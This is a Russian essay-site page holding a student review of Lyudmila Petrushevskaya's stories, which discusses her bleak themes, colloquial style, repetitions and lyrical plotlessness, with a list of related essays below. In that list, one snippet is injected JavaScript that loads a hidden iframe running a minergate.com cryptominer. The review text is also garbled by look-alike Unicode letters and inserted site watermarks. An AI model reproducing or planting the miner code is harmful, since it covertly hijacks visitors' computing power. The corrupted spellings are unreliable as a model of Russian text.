-



   Рецензия на сборник рассказов Л. Петрушевской




doc.png  Тип документа: Сочинения


type.png  Предмет: Петрушевская Л.С.


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

Рецензия на сборник рассказов Л. Петрушевской

Людмилу Петрушевскую долго не печатали, учитывая, что её рассказы считали слишком мрачными

. В одном рассказе — самоубийство (“Грипп”), в другом — помешательство (“Бессмертная любовь”), в третьем — проституция (“Дочь Ксении”), в четвертом — прозябание несчастной семьи запрещенного и забытого писателя (“Козел Ваня”).
Рассказы, о которых пойдет речь, были написаны в конце шестидесятых—начале восьмидесятых годов

. В своих произведениях Петрушевская описывает современную жизнь, далекую от благополучных квартир и официальных приемных. Ее герои — незаметные, замученные жизнью люди, тихо или скандально страдающие в своих коммунальных квартирах и неприглядных дворах. Автор приглашает нас в ничем не примечательные служебные конторы и на лестничные клетки, знакомит с разнообразными несчастьями, с безнравственностью и отсутствием смысла существования.
Невозможно не сказать о своеобразном языке Петрушевской. Писательница на каждом шагу пренебрегает литературной нормой, и если у Зощенко, к примеру , автор выступает от имени внелитературного рассказчика, а Платонов создал собственный язык на базе общенародного, то тут мы имеем дело с вариантом той же задачи. Петрушевская при отсутствии рассказчика пользуется языковыми нарушениями, встречающимися в разговорной речи. Они не принадлежат ни рассказчику, ни персонажу. У них своя роль. Они воссоздают ту ситуацию, при которой появляются в разговоре. Текст с сайта Биг Реферат РУ На таком необычном построении и звучании и держится её проза.
Петрушевская пишет короткие рассказы. Среди них есть такие, что занимают две-три странички. Но это не миниатюры, не этюды или зарисовки, это рассказы, которые и короткими-то не назовешь, если учесть объем входящего в них жизненного материала.
Рассказ “Дядя Гриша” написан от первого лица. Молодая женщина снимает на лето часть сарая в подмосковном поселке и невольно наблюдает жизнь своих хозяев: дяди Гриши, тети Симы и их взрослых детей. И вот странность — она о них не рассказывает, а только упоминает. Может быть, ᴨᴏᴛому не рассказывает, что ничего не происходит? Да нет, происходит, еще как происходит — дядю Гришу убивают. Но об убийстве мы узнаем от нее почти случайно, из попутного, сделанного вскользь замечания.
Чуть ли не в каждом абзаце обсуждается опасность одинокого проживания на отшибе, вступающая в противоречие с чувством безопасности, которое испытывает героиня и которому, удивляясь, она придает какое-то преувеличенное значение. Мотив опасности (безопасности) звучит на протяжении всего рассказа. Так основательно исследуется ϶ᴛόᴛвопрос, что вырастает почти в проблему. Зачем — не сразу разберешь, но именно он формирует сюжет, который сам по себе на удивление мало о чем говорит: кто находится в опасности, остался невредим, а тот, кто её не ждал, сражен своенравным роком. Что-то водевильное, анекдотическое содержится в капризе обстоятельств, несмотря на убийство.
А рассказ-то грустный. Что именно вызывает горькое чувство? Смысл складывается из разнородных элеменᴛᴏʙ, из обмолвок и повторов, топтания на месте, проходных сценок и отступлений, сплошного, можно сказать, отступления, ибо отсутствует сюжетная линейность. На что это похоже? На стихи. Сюжет в поэзии строится иначе, чем в прозе, — свободно, ассоциативно, непоследовательно.
Вместо того чтобы развиваться, сюжет у Петрушевской концентрируется вокруг какого-то одного момента или эпизода. Например, “Удар грома”. Само название концентрирует внимание на одном моменте. Внезапное вмешательство в телефонный разговор третьего лица, очевидно по параллельному телефону, было воспринято героиней как удар грома и положило конец и телефонному разговору, и вообще знакомству. Между делом выясняется характер восьмилетних отношений действующих лиц — некоего Зубова и его приятельницы Марины, их семейные обстоятельства и служебное положение, но согласно строению сюжета все эти сведения предстают как дополнительный материал к минутной ситуации телефонного разговора.
В рассказе “Милая дама” описан момент отъезда. Человек сидит в такси на заднем сиденье и посылает прощальную улыбку снизу вверх, адресованную молодой женщине, “милой даме”, с которой расстается навсегда. То, что читателю сообщается о нем и о ней, пристегнуто к этому моменту: в центре сюжета — одна прощальная сцена.
Не развертывая, а, наоборот, сворачивая жизненное событие, Петрушевская выделяет в нем проходной эпизод, не итоговый результат: телефонный разговор, отъезд в такси.
Автор, и это еще одно свойство прозы Петрушевской, всеми силами скрывает, подавляет и сдерживает свои чувства. Огромную роль в своеобразии её рассказов играют повторы, создающие впечатление упорной сосредоточенности, которая владеет автором до забвения формы, до пренебрежения “правилами хорошего стиля”.
Например, в рассказе “Удар грома” только в одном абзаце четыре раза повторяется слово “факт” и три раза — “плоскости”. Видно, заинтересованность в предмете совершенно переключила внимание рассказчика с формы речи на суть дела. Не будет преувеличением сказать, что весь текст буквально прошит повторяющимися словами и словосочетаниями, которые изредка разбавлены выпадающими из стиля и ᴨᴏᴛому особенно красноречивыми выражениями вроде “нежные лепестки” — о люстре. Текст с сайта Биг Реферат РУ
Страстное разбирательство — вот что такое жизнь в рассказах Петрушевской. Она — лирик, и, как во многих лирических стихах, в её прозе нет лирического героя и не важен сюжет. Ее речь, как речь лирика , сразу о многом. Конечно, не всегда сюжет её рассказа непересказуем и незначителен, но главное в её прозе — всепоглощающее чувство, создаваемое ᴨᴏᴛоком авторской речи.
В литературе шестидесятых—восьмидесятых годов Л. Петрушевская не осталась не замеченной благодаря её способности соединять поэзию и прозу, которая придает ей особую, необычайную манеру повествования.



Похожие документы


Анализ стихотворения Бунина «Одиночество» (сборник стихов «Листопад»)
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

Художественный стиль рассказов Чехова
В своих произведениях Чехов опускал такие важные сведения, как родословная, биография героев. Основным средством характеристики был портрет, хотя он тоже не соответствовал привычному представлению. Это было не описание цвета волос, глаз и тому подобное, писатель выбирал две-три наиболее точные и меткие детали, и этого было достаточно для яркого представления образа в целом. Например, в рассказе «Ионыч» Чехов показывает деградацию главного героя Старцева, в частности, через портрет. В начале рассказа он «шел пешком не спеша......

Анализ первых рассказов Фадеева
С немалыми политическими амбициями и начинал Фадеев свою писательскую деятельность. А в литературу он пришел не случайно. В отличие от многих партийных работников, стремившихся установить свою власть в литературе и искусстве при полной собственной бесталанности, он был человеком художественно одаренным. И заявило о себе его дарование в первой же повести «Разлив» (1923) неожиданным для самого автора своеволием. Недавний военкомбриг Александр Булыга (партизанский псевдоним Фадеева) намеревался дать в этой повести картину борьбы за Советскую власть в одном из уссурийских сел. И старательно выписывал фигуру главного героя, большевика Неретина. И тщательно продумывал все его дела и поступки. А начинающего прозаика Сашу Фадеева то и дело уводили в сторону от этого замысла какие-то очень искренние, но совершенно аполитичные страсти и эмоции....

«Кобзарь» первый сборник стихотворений поэта Тараса Григорьевича Шевченко
 «Кобзарь» - так был назван первый сборник стихотворений украинского поэта Тараса Григорьевича Шевченко. Кобзарем, народным певцом называли украинцы своего великого земляка. Влияние его идей, его творчества на современников было огромным, жизнь же была тяжелой, подчас трагичной. 47 лет всего прожил поэт и только 13 из них провел па свободе. Крепостной помещика Энгельгардта, он получил «вольную» лишь в 24 года. А через 9 лет был арестован и сослан в далекую Орскую крепость «за сочинение возмутительных и в высшей степени дерзких стихотворений». Украинский поэт Иван Франко писал, что Шевченко терпел 10 лет от российской военщины и сделал больше для свободы России, чем 10 победоносных армий. Исследователи творчества и жизни Шевченко называют его жизнь «героическим подвигом беззаветного служения людям», подвигом, в котором заключено «непреходящее значение творчества и революционной деятельности» поэта....

Образ Украины в цикле рассказов П. Тычины
Цикл «Скорбная мать» написан в 1918 года и имеет посвящение «Памяти моей матери». Вместе с тем важную роль сыграет в этих стихах и библейский образ Божьей Матери. Итак, образ матери возникает и как воплощение конкретной женщины-матери поэта, и как олицетворение Матери Божьей, и как символ матери-Украины. Такая символика разрешает П. Тычине подняться к широким обобщениям в изображении темы. Образ Матери Иисуса поэт изображает как символ вечных моральных ценностей, как олицетворение вселенской матери-страданицы. Это о ней обращенные слова всей земли: «Побудь, побудь с нами!» В следующих сроках поэт высказывается еще откровеннее:...

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям